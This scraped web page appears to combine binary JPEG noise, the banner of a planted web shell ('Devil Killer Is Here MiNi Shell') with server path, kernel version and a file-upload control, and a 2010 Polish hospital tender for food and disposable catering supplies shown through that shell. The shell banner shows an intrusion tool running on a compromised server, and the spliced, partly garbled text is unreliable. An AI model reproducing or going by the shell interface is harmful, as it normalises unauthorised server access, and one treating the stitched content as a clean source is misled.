JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100413/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100413/103934-N-2010.html

<p class="kh_header"><b>Sosnowiec: Dostawa produktów spożywczych i opakowań jednorazowych</b><br>
<b>Numer ogłoszenia: 103934 - 2010; data zamieszczenia: 13.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej Szpital Miejski w Sosnowcu , ul. Szpitalna 1, 41-219 Sosnowiec, woj. śląskie, tel. 0-32 2964219, 3630479, faks 0-32 2964219, 2635719.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa produktów spożywczych i opakowań jednorazowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	 Przedmiotem zamówienia jest dostawa produktów spożywczych i opakowań jednorazowych.
kod CPV: 15800000-6 - Różne produkty spożywcze
kod CPV: 39222100-5 - Artykuły cateringowe jednorazowe
   Zamówienie składa się z 31 części tzw. pakietów, z których każdy stanowi oddzielny przedmiot zamówienia:
Pakiet nr 1  - Opakowania jednorazowe - kod CPV: 39222100-5 Artykuły cateringowe jednorazowe;
Pakiet nr 2  - Galanteria mleczarska - kod CPV: 15500000-3 Produkty mleczarskie;
Pakiet nr 3  - Galanteria mleczarska - kod CPV: 15500000-3 Produkty mleczarskie;
Pakiet nr 4 - Mleko, ser twarogowy, śmietana, masło - kod CPV: 15511000-3 Mleko, 15512000-0 Śmietana, 15542100-0 Ser twarogowy, 15530000-2 Masło;
Pakiet nr 5 - Lody - kod CPV: 15555100-4 Lody;
Pakiet nr 6 - Soki owocowe, warzywne - kod CPV: 15320000-7 Soki owocowe i warzywne;
Pakiet nr 7  - Soki warzywne - naturalne jednodniowe, sałatki, surówki krótkotrwałe - 
kod CPV: 15331000-7 Warzywa przetworzone;
Pakiet nr 8  -  Owoce świeże krajowe - kod CPV: 03222000-3 Owoce i orzechy, 03222321-9 Jabłka, 03222313-0 Truskawki, 03222334-3 Śliwki;
Pakiet nr 9  -  Owoce południowe - kod CPV: 03222110-7 Owoce tropikalne
Pakiet nr 10  -  Chrupki, chipsy, orzeszki - kod CPV: 
     15312300-1 - Chipsy ziemniaczane,
     15894400-5 - Przekąski;
Pakiet nr 11   -  Zupy w proszku - kod CPV: 15891000-0 Zupy i buliony;
Pakiet nr 12 - Słodycze - kod CPV: 15842300-5 Wyroby cukiernicze, 15842000-2 Czekolada i wyroby cukiernicze, 15812100-4 Wyroby ciastkarskie;
Pakiet nr 13 -  Kawa naturalna - kod CPV: 15861000-1 Kawa;
Pakiet nr 14 -  Przyprawy - kod CPV: 15870000-7 Przyprawy i przyprawy korzenne;
Pakiet nr 15 - Artykuły sypkie - kod CPV: 
     15830000-5 - Cukier i produkty pokrewne, 
     15612000-1 - Mąka zbożowa lub roślinna i podobne produkty; 
Pakiet nr 16 - Przyprawy do ciast - kod CPV: 
 15899000-6 -Proszek do pieczenia, 
    15842100-3- Czekolada, 
    15841000-5 -Kakao, 
    15612400-5 - Mieszanki do przygotowania  wypieków piekarskich;
Pakiet nr 17 - Tłuszcze roślinne - kod CPV: 15412200-1 Tłuszcze roślinne;
Pakiet nr 18 - Herbata - kod CPV: 15863000-5 Herbata;
Pakiet nr 19 - Żurek w płynie - kod CPV: 15800000-6 -  Różne produkty spożywcze;
Pakiet nr 20 - Jaja spożywcze  - kod CPV: 03142500-3 Jaja;
Pakiet nr 21 - Mrożonki - kod CPV: 15331170-9 Warzywa mrożone;
Pakiet nr 22 - Ryby, przetwory rybne - kod CPV: 03311000-2 Ryby;
Pakiet nr 23 - Wyroby garmażeryjne gotowe i dodatki garmażeryjne - kod CPV:   
15894200-3 Posiłki gotowe, 15872400-5 Sól, 15831000-2 Cukier, 15871260-4 Sosy, 15871230-5 Ketchup;
Pakiet nr 24 - Wyroby mączne mrożone - kod CPV: 15896000-5 Produkty głęboko mrożone;
Pakiet nr 25 - Przetwory warzywne, konserwy mięsne i rybne - kod CPV: 15131000-5 Konserwy i przetwory z mięsa, 15897200-4 Produkty puszkowane, 15800000-6 Różne produkty spożywcze;
Pakiet nr 26 - Warzywa korzeniowe, kapustne, zielone - kod CPV: 03221000-6 Warzywa, 
03221400-0 Warzywa kapustne, 03221120-3 Warzywa bulwiaste, 03221300-9 Warzywa liściaste; 
Pakiet nr 27 - Ziemniaki jadalne - kod CPV: 03212100-1 Ziemniaki;
Pakiet nr 28 -  Kiszonki - kod CPV: 
       15331000-7 - Warzywa przetworzone, 
       15331142-4 - Kapusta przetworzona;
Pakiet nr 29 -  Warzywa młode, sezonowe, nowalijki - kod CPV: 03221000-6 Warzywa
Pakiet nr 30 - Wędliny paczkowane kod CPV: 15131130-5 Wędliny, 15131120-2 Produkty wędliniarskie.
Pakiet nr 31 - Przetwory warzywne, konserwy mięsne i rybne - kod CPV: 15897200-4 Produkty puszkowane, 15800000-6 Różne produkty spożywcze.
2.	Szczegółowy opis przedmiotu zamówienia - asortyment oraz ilości znajdują się 
w załącznikach nr 4.1 - 4.31 do SIWZ.
3.	Przedmiot umowy rozliczany będzie na podstawie faktur częściowych.
4.	Wymagania dotyczące wszystkich pakietów:
       4.1 Wykonawca zobligowany jest do przestrzegania ustawy z dnia 25 sierpnia 2006r. 
       o bezpieczeństwie żywności i żywienia (Dz.U. Z 2006r. Nr 171, poz. 1225 z póź. zm.).
      Wykonawca zobowiązany jest do sukcesywnej dostawy przedmiotu zamówienia wg                   zamówień telefonicznych, z rozładunkiem do wskazanych obiektów szpitalnych tj. do  kuchni-kiosku-baru przy ul. Zegadłowicza 3 i-lub ul. Szpitalna 1 zgodnie z wyborem Zamawiającego.
     4.2 Wszystkie dostawy odbywać się będą na koszt Wykonawcy.
     4.3 Środek transportu dopuszczony do przewozu art. żywnościowych przez Państwową       Inspekcję Sanitarną.
     4.4 Oznakowania art. żywnościowych zgodne z dyrektywami Unii Europejskiej i wytycznymi Kodeksu Żywnościowego obowiązującego w Europie:
-	nazwa środka spożywczego,
-	data minimalnej trwałości lub termin przydatności do spożycia (nie dotyczy:  	świeżych, nie obranych owoców, warzyw, ziemniaków, cukru, octu, soli 	
	niejodowanej).
-	zawartość netto lub liczbę sztuk w opakowaniu,
-	warunki przechowywania - przy znakowaniu terminem przydatności do spożycia 	  oraz w przypadku gdy jakość środka spożywczego w istotny sposób zależy od 		  warunków jego przechowywania.
-	nazwę i adres producenta,
-	dane wprowadzające środek spożywczy do obrotu w kraju,
-	kraj w którym wyprodukowano środek spożywczy,	
-	klasę jakości handlowej lub inny wyróżnik jakości handlowej o ile określono 		  klasyfikację jakościową,
-	oznakowanie partii produkcyjnej umożliwiającej identyfikację środka spożywczego
5. Wymagania szczegółowe dotyczące pakietów: 
a) opakowania jednorazowe (Pakiet nr 1): 
- dostawy wg zamówień telefonicznych nie rzadziej niż raz w tygodniu,
- opakowania posiadają atesty PZH dopuszczające stykanie się z żywnością.
b) galanteria mleczarska (Pakiet nr 2 i 3):
- zamówienia telefoniczne  wg  potrzeb,
Dostawy:
- dostawy wg potrzeb,
- każda dostawa opatrzona atestami wystawionymi przez laboratorium kontroli jakości,
- terminy przydatności do spożycia:
- środek transportu dopuszczony do przewozu w warunkach chłodniczych art. żywnościowych przez Państwową Inspekcję Sanitarną 
( możliwość kontroli dokumentacji monitorowania temperatur podczas transportu surowca w dniu dostawy).
c) mleko, ser twarogowy, śmietana, masło (Pakiet nr 4):
- zamówienia telefoniczne codzienne wg potrzeb do godz. 14:00,
Dostawy:
- mleko luz w opakowaniach foliowych lub konwiach, codziennie oprócz niedziel i świąt 
(w soboty dostawa podwójna) do godz. 6:00, bezpośrednio do kuchni;
- pozostałe dostawy wg potrzeb min. 2 x w tygodniu;
- każda dostawa opatrzona atestami wystawionymi przez laboratorium kontroli jakości;
Terminy przydatności do spożycia:
- mleko - wg atestu laboratorium,
- masło nie krótszy niż 2 tygodnie w dniu dostawy,
- ser twarogowy - 1 tydzień licząc od dnia dostawy.
Środek transportu dopuszczony do przewozu w warunkach chłodniczych przez Państwową Inspekcję Sanitarną - możliwość kontroli dokumentacji monitorowania temperatury podczas transportu w dniu dostawy surowca.
d) lody (Pakiet nr 5):
- zamówienia telefoniczne z jednodniowym wyprzedzeniem,
- dostawy wg zamówień telefonicznych,
- okres przydatności do spożycia w dniu dostawy nie krótszy niż 6 m-cy,
-środek transportu dopuszczony do przewozu art. żyw. mrożonych w warunkach chłodniczych przez Państwową Inspekcję Sanitarną - możliwość kontroli dokumentacji monitorowania temp. podczas transportu w dniu dostawy surowca.
e) soki owocowe, warzywne (Pakiet nr 6): 
- zamówienia telefoniczne dostawy nie rzadziej niż jeden raz w tygodniu,
- termin przydatności do spożycia nie krótszy niż 1 rok.
f) soki warzywne - naturalne jednodniowe, sałatki, surówki krótkotrwałe (Pakiet nr 7):
- dostawy codzienne wg zamówień codziennych
- zwrot soków i surówek nie sprzedanych
g) owoce świeże krajowe (Pakiet nr 8), owoce południowe (Pakiet nr 9):
- zamówienia telefoniczne z jednodniowym wyprzedzeniem,
- dostawy owoców świeżych krajowych oraz południowych dwa razy w tygodniu,
- owoce krajowe: preferowani bezpośredni producenci rolni
h) chrupki, chipsy, orzeszki (Pakiet nr 10), zupy w proszku (Pakiet nr 11), słodycze (Pakiet nr 12), kawa naturalna (Pakiet nr 13), herbata (Pakiet nr 18):
- zamówienia telefoniczne,
- dostawy nie rzadziej niż jeden raz w tygodniu,
- terminy przydatności do spożycia nie krótsze niż 3 m-ce.
i) przyprawy (Pakiet nr 14), artykuły sypkie (Pakiet nr 15), przyprawy do ciast (Pakiet nr 16):
- dostawy wg zamówień telefonicznych z wyprzedzeniem dwudniowym minimum 1x w tygodniu,
- przyprawy pakowane : opakowania jednostkowe od 20 - 500g,
- terminy przydatności do spożycia w dniu dostawy nie krótsze niż 3 m-cy.
j) tłuszcze roślinne (Pakiet nr 17):
- termin przydatności do spożycia w dniu dostawy nie krótszy niż 1 miesiąc,
- dostawy wg zamówień telefonicznych nie rzadziej niż 2x w miesiącu.
k) żurek w płynie (Pakiet nr 19):
- zamówienia telefoniczne składane z jednodniowym wyprzedzeniem wg potrzeb,
- dostawy 1 x w tygodniu wg potrzeb,
- art. żywnościowy powinien posiadać oznakowanie terminu przydatności do spożycia 
min. 2 tygodnie w dniu dostawy.
l) jaja spożywcze średnie (Pakiet nr 20):
-dostawcy jaj: wymagane świadectwo jakości dotyczące pochodzenia surowca 
-fermama wolna od Salmonelli
- zamówienia składane telefonicznie z dwudniowym wyprzedzeniem,
- dostawy wg potrzeb nie rzadziej niż 2x w miesiącu.
ł) mrożonki (Pakiet nr 21), ryby, przetwory rybne (Pakiet nr 22):
- zamówienie składane telefonicznie z dwudniowym wyprzedzeniem,
- dostawy zgodnie z zamówieniem nie rzadziej niż 3x w miesiącu,
- termin przydatności do spożycia nie krótszy niż 6 miesięcy w dniu dostawy.
Środek transportu dopuszczony do przewozu art. żyw. mrożonych w warunkach chłodniczych przez Państwową Inspekcję Sanitarną - możliwość kontroli dokumentacji monitorowania temp. podczas transportu w dniu dostawy surowca.
m) wyroby garmażeryjne gotowe mrożone i dodatki garmażeryjne (Pakiet nr 23):
- zamówienia telefoniczne z jednodniowym wyprzedzeniem,
- dostawy nie rzadziej niż jeden raz w miesiącu,
- termin przydatności do spożycia w dniu dostawy nie krótszy niż 14 dni,
- możliwość zwrotu artykułów nie sprzedanych, a którym upłynął termin przydatności do spożycia.
Środek transportu dopuszczony do przewozu art. żyw. mrożonych w warunkach chłodniczych przez Państwową Inspekcję Sanitarną - możliwość kontroli dokumentacji monitorowania temp. podczas transportu w dniu dostawy surowca.
n) wyroby mączne mrożone (Pakiet nr 24):
- zamówienia telefoniczne z jednodniowym wyprzedzeniem
- dostawy nie rzadziej niż jeden raz w miesiącu
- termin przydatności do spożycia nie krótszy niż 30 dni
Środek transportu dopuszczony do przewozu art. żyw. mrożonych w warunkach chłodniczych przez Państwową Inspekcję Sanitarną - możliwość kontroli dokumentacji monitorowania temp. podczas transportu w dniu dostawy surowca.
o) przetwory warzywne, konserwy mięsne i rybne (Pakiet nr 25 i 31):
- zamówienia telefonicznie z jednodniowym wyprzedzeniem,
- dostawy nie rzadziej niż raz na tydzień,
- termin przydatności do spożycia nie krótszy niż 2 tygodnie w dniu dostawy,
- przetwory w puszkach - termin przydatności do spożycia 1 rok,
Środek transportu dopuszczony do przewozu art. żyw. mrożonych w warunkach chłodniczych przez Państwową Inspekcję Sanitarną - możliwość kontroli dokumentacji monitorowania temp. podczas transportu w dniu dostawy surowca.
p) warzywa korzeniowe, kapustne, zielone (Pakiet nr 26), ziemniaki jadalne (Pakiet nr 27), warzywa młode, sezonowe, nowalijki (Pakiet nr 29):
- zamówienia składane telefonicznie wg potrzeb z dwudniowym wyprzedzeniem.
- dostawy nie rzadziej niż  2x w tygodniu,
- warzywa korzeniowe, ziemniaki segregowane wg wielkości, czyste, pakowane ~ 25kg.
r) kiszonki (Pakiet nr 28):
- zamówienia składane telefonicznie z dwudniowym wyprzedzeniem,
- dostawy 1x w tygodniu,
- kiszonki pakowane w beczki  poj. 30-50kg, wiadra poj. 5-15kg: zamawiający dopuszcza 
różnicę w wielkości opakowań ? 5kg,
- termin przydatności do spożycia w dniu dostawy nie krótszy niż 3 miesiące.
s) wędliny paczkowane (Pakiet nr 30):
- zamówienia telefoniczne z jednodniowym wyprzedzeniem wg potrzeb,
     - dostawy 2 x w tygodniu,
     - dostawy opatrzone handlowym dokumentem identyfikacyjnym zawierającym:
        weterynaryjny nr identyfikacyjny zakładu,
        zakład zakwalifikowany do prowadzenia sprzedaży na rynek,
        opis towaru,
        pochodzenie surowca,
        miejsce przetworzenia,
- towar etykietowany zawierający wszystkie dane identyfikujące daną partie towaru,
- środek transportu dopuszczony do przewozu w warunkach chłodniczych przez Państwową Inspekcję Sanitarną - możliwość kontroli dokumentacji monitorowania temperatury podczas transportu w dniu dostawy surowca.
6. Termin płatności: do 30 dni od dnia otrzymania prawidłowo wystawionego oryginału faktury..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 18.80.00.00-6, 39.22.21.00-5, 15.50.00.00-3, 15.51.10.00-3, 15.51.20.00-0, 15.54.21.00-0, 15.53.00.00-2, 15.55.51.00-4, 15.32.00.00-7, 15.33.10.00-7, 03.22.20.00-3, 03.22.23.21-9, 03.22.23.13-0, 03.22.23.34-3, 03.22.21.10-7, 15.31.23.00-1, 15.89.44.00-5, 15.89.10.00-0, 15.84.23.00-5, 15.86.10.00-1, 15.87.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 31.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje obowiązku wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca spełni warunek w przypadku, gdy posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
2. Zamawiający dokona oceny spełniania tego warunku w przypadku przedłożenia przez Wykonawcę w ofercie oświadczenia o spełnianiu warunków udziału w postępowaniu (według Załącznika nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca spełni warunek w przypadku gdy zrealizował dostawy produktów spożywczych lub/i opakowań jednorazowych w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem przedmiotowi zamówienia.
2. Zamawiający dokona oceny spełniania tego warunku w przypadku przedłożenia przez Wykonawcę w ofercie oświadczenia o spełnianiu warunków udziału w postępowaniu (według Załącznika nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca spełni warunek w przypadku, gdy dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonywania zamówienia.
2. Zamawiający dokona oceny spełniania tego warunku w przypadku przedłożenia przez Wykonawcę w ofercie oświadczenia o spełnianiu warunków udziału w postępowaniu (według Załącznika nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca spełni warunek w przypadku gdy dysponuje osobami zdolnymi do wykonania zamówienia, posiadającymi wiedzę i doświadczenie.
2. Zamawiający dokona oceny spełniania tego warunku w przypadku przedłożenia przez Wykonawcę w ofercie oświadczenia o spełnianiu warunków udziału w postępowaniu (według Załącznika nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca spełni warunek w przypadku gdy znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
2. Zamawiający dokona oceny spełniania tego warunku w przypadku przedłożenia przez Wykonawcę w ofercie oświadczenia o spełnianiu warunków udziału w postępowaniu (według Załącznika nr 2 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie, że Wykonawca dostarczy przedmiot zamówienia posiadający wymagane prawem, wydane przez uprawniony organ, aktualne świadectwa dopuszczenia do obrotu i stosowania na rynku polskim zgodnie z aktualnie obowiązującymi przepisami - zawarte w załączniku nr 1 SIWZ - Formularzu oferty</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku ustawowej zmiany stawki podatku VAT lub w przypadku korzystnych zmian cenowych dla Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.sosnowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Szpital Miejski w Sosnowcu, 41 - 219 Sosnowiec, 
ul. Szpitalna 1.</p>
